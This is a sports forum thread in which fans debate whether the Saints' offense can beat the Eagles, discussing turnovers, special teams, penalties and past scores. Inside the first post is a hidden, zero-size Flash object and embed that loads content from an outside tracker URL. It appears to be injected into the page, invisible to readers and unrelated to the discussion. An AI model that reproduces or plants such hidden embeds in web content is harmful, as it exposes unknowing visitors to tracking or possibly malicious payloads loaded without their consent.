I think our Offense is going to surprise everyone in Philly (1 Viewer)

I think if on offense we don't commit any turnovers, that even if our defense doesn't force any turnovers, we win this game. On pure production, our offense >>> their offense.

I don't think I'll be too surprised if our O hangs 30 on them, I don't think Philly fans will either. I don't think its a secret about our O being the best in the bizz.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

But yeah those are great weapons to have, can't beat that.

Our O has to be tough to defened. Hopefully we can hang onto the ball on special teams. Anyone else getting the feeling this could be our year? If we win big this week, man things are gonna get exciting round here.

I doubt we score the points that yuo guys are expecting. Twenty and good defense would be ok with me.

I doubt we score the points that yuo guys are expecting. Twenty and good defense would be ok with me.

We've scored 27 (twice) and 23 points against them the last 3 times we played them and that was with Bradley and Dawkins.

People are overrating their defensive prowess based on the Panthers giftwrapping them a game.

Thier secondary and overall defense is pretty impressive. We gotta keep the turnovers down.

There are certain things to consider here in order for us to win.

1. Special Teams. Philly's Special Teams play was very good last week. Our ST are, in my opinion, the weak link this season.

2. Coach Payton forcing Reggie in North-South running situations. Coach likes to almost force Reggie into those situations. Let Pierre and Mike handle that and we'll be golden.

3. Penalties. We need to eliminate the stupid penalties and mental errors. Penalties is what keeps the other team in team in the game.

4. Turnovers. The D needs to create them and we need to eliminate them. Please Payton, no more razzle dazzle flea-flickers when we're up!

We've scored 27 (twice) and 23 points against them the last 3 times we played them and that was with Bradley and Dawkins.

People are overrating their defensive prowess based on the Panthers giftwrapping them a game.

yeah I told my hubby that the Saints will win and score a lot, and he said 'did you see what they did to Carolina', so I said, 'Honey, Jake ain't no Drew. The Cardinals killed Jake. The Eagles better watch out.'

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom